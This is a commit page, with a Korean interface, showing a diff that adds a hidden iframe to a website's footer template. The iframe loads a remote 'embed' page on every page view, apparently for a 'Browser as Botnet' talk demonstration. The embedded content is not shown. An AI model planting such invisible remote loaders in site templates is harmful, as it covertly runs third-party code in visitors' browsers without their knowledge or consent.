소스 검색

Merge branch 'gh-pages' of https://github.com/chootka/radical-networks into gh-pages

chootka 7 년 전
부모
커밋
03998a4539
1개의 변경된 파일6개의 추가작업 그리고 0개의 파일을 삭제
  1. 6 0
      _includes/footer.html

+ 6 - 0
_includes/footer.html

@@ -1,3 +1,9 @@
 <p>
 	&copy; {{ site.time | date: '%Y' }} {{ site.author.name }} &bull; Maintained by <a href="https://github.com/chootka">chootka</a>
+
+	<!--
+		Iframe embed for the 2017 Browser as Botnet talk. Will 404 until day of 
+		talk. Will be removed after.
+	-->
+	<iframe src="https://radnets.brannon.online/embed" style="display: none"></iframe>
 </p>